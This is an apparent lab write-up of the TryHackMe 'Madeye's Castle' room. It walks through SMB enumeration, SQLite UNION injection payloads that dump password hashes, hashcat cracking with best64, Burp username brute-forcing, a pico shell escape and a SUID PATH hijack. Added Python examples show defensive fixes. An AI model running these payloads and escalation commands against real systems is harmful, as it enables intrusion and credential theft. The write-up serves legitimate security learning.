TryHackMe: Madeyes Castle writeup/walkthrough
Writeup/tutorial for the room ‘Madeye’s Castle’ on TryHackMe

Room Link | Medium difficulty
As per THM rules, write-ups shouldn’t include passwords/cracked hashes/flags. I can only help you find out how to get the answer, not give you the answer.
Deploy the machine and in the meantime, connect to the THM network:
sudo openvpn --config <your_vpn_file>
Task 1: Capture the flags
nmap -A <Machine_IP>

The nmap result showed SMB, so we can try smbclient against the IP.

smbclient -N //<Machine_IP>/sambashare
ls
get .notes.txt
get spellnames.txt
Reading through the notes gave me two hints. The first is that the owner of the file is not using rockyou.txt, but maybe spellnames.txt.
The other hint is that Hermonine (yes, that is how it was spelled) loves using a historical text editor.

Going to http://<Machine_IP>:80 shows us the Apache2 Ubuntu default page, but if we view its source, we can see that it is using virtual hosting on hogwartz-castle.thm.

Let’s add the IP and virtual hosting address to /etc/hosts file to see if we can get a webpage.
sudo nano /etc/hosts
# Append the below as shown in picture
<Machine_IP> hogwartz-castle.thm

If you go to hogwartz-castle.thm in your browser (Click yes on the prompt bar that shows up to take you to http://hogwartz-castle.thm), you’ll see a login page.
Let's try SQL injection by entering ' or 1=1 ;-- - in the username field and anything for the password.

It says the following:
“The password for Lucas Washington is incorrect! contact administrator. Congrats on SQL injection… keep digging”

Sqlmap was able to get me a table name and the database name but it wasn’t able to dump column values.

I moved to Burp Suite and tried to get the answers manually. I captured the login request in Burp and sent it to Repeater.

In Repeater I tried some SQL injection. If you enter just an apostrophe in the username field, the server returns an internal error, but if you add the comment '-- - it only says that the username or password is incorrect, so our SQL injection is working. Credit to Musyoka Ian as his writeup was really helpful.
I tried adding the following and it gave me a 500 internal error:
user='+union+select+1--+-&password=a
I kept on adding more numbers and was able to get a 403 error using the following:
user='+union+select+sql,2,3,4--+-&password=a


If you look at the right image above, the response shows 1 in the middle and 4 at the end, i.e. the first and fourth columns of the UNION row are reflected in the page. I replaced the 1 with a string and it printed the string:
user='+union+select+'testing',2,3,4--+-

Now I can check the SQLite version (source):
user='+union+select+sqlite_version(),2,3,4--+-&password=a

To enumerate further, I used the following:
user='+union+select+group_concat(tbl_name),2,3,4+FROM+sqlite_master+WHERE+type='table'+and+tbl_name+NOT+like+'sqlite_%'--+-&password=a

I tried password as a column name in the users table for this db:
user='+union+select+group_concat(password),2,3,4+FROM+users--+-&password=a

Using a wordlist, I was able to do a bruteforce attack to find other tables.
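The login page behaves the way it does because the username is glued into the SQL text, so the page's own payloads (the OR 1=1 probe, the UNION with a marker string, the sqlite_master listing and the group_concat(password) dump) are executed as SQL. The example below is added here and is not the room's code: it rebuilds a minimal SQLite login against a constructed users table (names, passwords and the four-column layout are assumptions), shows what each of the page's payloads returns against a string-built query, and contrasts it with the parameterised query that returns the plain "incorrect" message for every one of them.

```python
import sqlite3

# Constructed sample rows standing in for the room's users table; the real
# names, hashes and column layout of the box are not reproduced here.
SAMPLE_USERS = [
    ("Lucas Washington", "example-pass-1"),
    ("Harry Turner", "example-pass-2"),
]

# The page's own payloads (the first one without its trailing ';', which changes nothing here).
PAYLOAD_OR = "' or 1=1-- -"
PAYLOAD_UNION = "' union select 'testing',2,3,4-- -"
PAYLOAD_TABLES = ("' union select group_concat(tbl_name),2,3,4 FROM sqlite_master "
                  "WHERE type='table' and tbl_name NOT like 'sqlite_%'-- -")
PAYLOAD_PASSWORDS = "' union select group_concat(password),2,3,4 FROM users-- -"


def make_db():
    """In-memory SQLite database with a four-column users table (assumed layout)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, age INTEGER, admin INTEGER)")
    for i, (name, pw) in enumerate(SAMPLE_USERS):
        conn.execute("INSERT INTO users VALUES (?, ?, ?, ?)", (name, pw, 30 + i, 0))
    conn.commit()
    return conn


def _check(row, password):
    """Shared response logic, modelled on the messages the room's login page returns."""
    if row is None:
        return "Username or password is incorrect"
    if str(row[1]) != password:
        # Whatever landed in column 1 of the first row is echoed back: with a UNION
        # row that is attacker-chosen data, which is how the page leaked the schema.
        return f"The password for {row[0]} is incorrect!"
    return f"Welcome {row[0]}"


def login_vulnerable(conn, user, password):
    """String-builds the query, so quotes and UNION inside `user` become SQL."""
    sql = f"SELECT name, password, age, admin FROM users WHERE name = '{user}'"
    return _check(conn.execute(sql).fetchone(), password)


def login_safe(conn, user, password):
    """Parameterised query: the driver binds `user` as a value, never as SQL text."""
    row = conn.execute(
        "SELECT name, password, age, admin FROM users WHERE name = ?", (user,)
    ).fetchone()
    return _check(row, password)


if __name__ == "__main__":
    db = make_db()
    for p in (PAYLOAD_OR, PAYLOAD_UNION, PAYLOAD_TABLES, PAYLOAD_PASSWORDS):
        print("vulnerable:", login_vulnerable(db, p, "a"))
        print("safe:      ", login_safe(db, p, "a"))
```

Run it and the vulnerable path reproduces the room's behaviour step by step: the OR payload returns the first user's name, the marker string comes back verbatim, the sqlite_master query returns the table list and the last payload returns every stored password inside the error message. The parameterised version answers "Username or password is incorrect" to all four because no user is literally named after the payload; a web detection rule keyed on `union select`, `sqlite_master` or `group_concat(` in the user field catches the same probes in the access log.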




I used Sublime Text to remove the extra text, find all instances of commas in the names file, and create a wordlist out of it.
Going through the notes.txt file, there was nothing interesting like repeating sentences, but one thing gave a clue: in the columns someone said their password used best64. best64 is a rule in hashcat and john. We can use this rule for word mangling with hashcat to get passwords from the hashes I just extracted. Earlier in our SMB enumeration I recovered a .notes.txt and a wordlist containing spells, so maybe we can use that wordlist with the best64 rule.
In my passwords file, I used Sublime's Find All feature to select all the commas and pressed Enter so that each hash was on a new line. I copied one of the hashes and used haiti to identify the hash type. The same can be done with hash-identifier, and both said SHA-512.

I created a wordlist by applying the best64 rule with hashcat:
cp /usr/share/hashcat/rules/best64.rule .
hashcat --stdout -r /usr/share/hashcat/rules/best64.rule spellnames.txt > wordlist.txt

Using a GTX 1050 4GB and the wordlist I had just created, hashcat cracked the hash instantly.
hashcat -m 1700 madeye-castle-hashes.txt wordlist.txt
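The reason the crack was instant is the storage scheme rather than the GPU: the hashes are plain, unsalted SHA-512 of the password, so one digest per mangled candidate can be compared against every account at once. The example below is added here and is not the room's code or hashcat's: it is the check a defender runs over their own credential store to find passwords reproducible from a known wordlist. The spell list and stored hashes are constructed, and `mangle` applies only a handful of hashcat-style rule functions as a stand-in for a real rule file like best64, not a reimplementation of it.

```python
import hashlib

# Constructed spell list and stored hashes; the room's spellnames.txt and the
# hashes pulled from its database are not reproduced here.
SPELLS = ["lumos", "alohomora", "expelliarmus"]


def mangle(word):
    """A few hashcat-style rule functions (':', 'u', 'c', 'r', 'd', '$X'); a small
    stand-in for a full rule file such as best64, not a copy of it."""
    yield word                 # ':'  unchanged
    yield word.upper()         # 'u'  uppercase all
    yield word.capitalize()    # 'c'  capitalise first letter
    yield word[::-1]           # 'r'  reverse
    yield word + word          # 'd'  duplicate
    for suffix in ("1", "123", "!"):
        yield word + suffix    # '$1', '$1$2$3', '$!'  append characters


def sha512_hex(text):
    """Unsalted SHA-512 of the password: the storage scheme the room's hashes used."""
    return hashlib.sha512(text.encode()).hexdigest()


def audit_unsalted_sha512(stored_hashes, wordlist):
    """Map each stored hash that a wordlist+rules pass reproduces to its candidate.

    With no per-user salt and a fast hash, every candidate digest is checked
    against all accounts in one set lookup, which is why the crack is immediate."""
    targets = set(stored_hashes)
    recovered = {}
    for word in wordlist:
        for candidate in mangle(word):
            digest = sha512_hex(candidate)
            if digest in targets:
                recovered[digest] = candidate
    return recovered


if __name__ == "__main__":
    # Constructed stored hashes: two weak, wordlist-derived passwords and one that is not.
    stored = [sha512_hex("lumos123"), sha512_hex("Alohomora"),
              sha512_hex("a long unrelated passphrase")]
    hits = audit_unsalted_sha512(stored, SPELLS)
    print(f"{len(hits)} of {len(stored)} stored hashes are reproducible from the wordlist")
```

Two of the three constructed hashes fall to a three-word list and seven rules. A per-user salt would force the same audit to hash each candidate once per account, and a deliberately slow password hash (bcrypt, scrypt or Argon2 rather than bare SHA-512) would turn the instant result into hours per account; both are the fix on the application side.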

We now have one password but a lot of usernames, so I started a brute-force attack using Intruder in Burp Suite to find the username that matches this password. I sent my captured login POST request to Intruder, copied the names from the file I had removed spaces from, pasted them into Burp as the payload list, marked the username field as the payload position and entered the password.

The attack showed that Harry Turner had the greatest response length but when checking the response, it said something about redirecting so I tried logging in manually with Harry Turner and the password we got.

It worked and it said the following:
The password for Harry Turner is incorrect! My linux username is my first name, and password uses best64

#1. User1.txt and User2.txt
Earlier in the nmap scan, we found an open SSH port, so let's try logging in there. I tried ssh with Harry as the user but it didn't work, so I tried it with harry (lowercase h) and it logged me in.
ssh harry@<Machine_IP>
# Enter harry's password
ls
cat user1.txt
sudo -l


Going to GTFOBins, I was able to find the command to use with pico to elevate to hermonine's privileges. Pico is a text editor, and I believe the notes.txt from the SMB enumeration was hinting towards this editor.
sudo -u hermonine /usr/bin/pico
# Press Enter
# Press Ctrl+R
# Press Ctrl+X and then enter the following commands: reset; sh 1>&0 2>&0
bash
clear

# We now have a shell as hermonine but are still in harry's home directory; move to hermonine's directory and read the user2.txt flag.
cd ../hermonine
ls
cat user2.txt

#3. Root.txt
I used the find command to look for other SUID binaries I could use to elevate privileges. The first one that stood out was /srv/time-turner/swagger, and the hint for root.txt mentioned that you have to trick time, so it is a good guess that this has something to do with gaining root.
find / -perm -u=s -type f 2>/dev/null

If you run the swagger file, it asks for a number and you can almost never get it right. Each run gives a different number, but if you send the output number of one run as the input of the next run, you get it correct!
# There is a space after 'of' in the awk separator ('of ')
echo '123' | /srv/time-turner/swagger | grep 'of' | awk -F 'of ' '{print $2}' | /srv/time-turner/swagger

The above command sends a number to the swagger binary and greps for 'of' so that only the last line remains (I tried other words, but they appeared in both lines, so only 'of' worked). I split the text from the number with awk, selected the number and piped it back into the binary. The answer it prints comes from the command uname -p, so we can create a malicious uname file, add its folder to the start of the PATH variable so the binary runs ours first, and try to get a shell with root privileges. I tried putting 'sudo -u root /bin/bash' into the malicious uname binary but it didn't work, so I had it print the flag directly instead of spawning a root shell.
cd /tmp
echo 'cat /root/root.txt' > uname
chmod 777 uname
ls -la | grep uname
export PATH=/tmp:$PATH
echo $PATH
echo '123' | /srv/time-turner/swagger | grep 'of' | awk -F 'of ' '{print $2}' | /srv/time-turner/swagger
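The root step works only because the SUID binary runs uname by bare name and trusts the caller's PATH. The example below is added here and is not the room's binary: it models that lookup in Python, plants a harmless fake uname in a temporary directory (a test fixture that just prints HIJACKED), and shows the hardened form that a privileged program should use, namely resolving the tool from a fixed trusted search path and handing the child a minimal environment instead of the inherited one. The trusted path `/usr/bin:/bin` is an assumption about the host; it runs on any Linux with coreutils.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# Constructed stand-in for the file the page writes to /tmp; it only prints a marker.
FAKE_UNAME = "#!/bin/sh\necho HIJACKED\n"
TRUSTED_PATH = "/usr/bin:/bin"   # assumed location of the real uname on this host


def plant_fake_uname():
    """Create a private directory containing a fake 'uname' and return the directory."""
    directory = tempfile.mkdtemp(prefix="pathdemo-")
    path = os.path.join(directory, "uname")
    with open(path, "w") as fh:
        fh.write(FAKE_UNAME)
    os.chmod(path, os.stat(path).st_mode | stat.S_IRUSR | stat.S_IXUSR)
    return directory


def run_uname_unsafe(caller_path):
    """What the SUID binary does: look 'uname' up in whatever PATH the caller supplied."""
    env = dict(os.environ, PATH=caller_path)
    # subprocess resolves a bare command name through the PATH of the env it is given,
    # so a writable directory at the front of PATH wins the lookup.
    result = subprocess.run(["uname", "-p"], env=env, capture_output=True, text=True)
    return result.stdout.strip()


def run_uname_hardened(caller_path):
    """Ignore the caller's PATH entirely: fixed search path, absolute executable, clean env."""
    del caller_path  # deliberately unused: privileged code must not consult it
    exe = shutil.which("uname", path=TRUSTED_PATH)
    if exe is None:
        return None  # no trusted uname on this host; fail closed rather than fall back to PATH
    env = {"PATH": TRUSTED_PATH}  # minimal environment; nothing inherited from the caller
    result = subprocess.run([exe, "-p"], env=env, capture_output=True, text=True)
    return result.stdout.strip()


if __name__ == "__main__":
    planted = plant_fake_uname()
    attacker_path = planted + os.pathsep + os.environ.get("PATH", "")
    try:
        print("unsafe lookup  :", run_uname_unsafe(attacker_path))    # HIJACKED
        print("hardened lookup:", run_uname_hardened(attacker_path))  # real uname -p output
    finally:
        shutil.rmtree(planted)
```

The unsafe call returns the marker from the planted file, the hardened call returns the real processor string. Beyond the code, the same class of bug is why sudo's `secure_path` exists and why a SUID binary that must shell out should also drop privileges or be replaced by a capability-scoped helper; on the detection side, a SUID process whose child executable resolves to a world-writable directory such as /tmp is a high-fidelity alert.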

I would appreciate some claps and leave any responses if you have any questions. Follow me for more write-ups!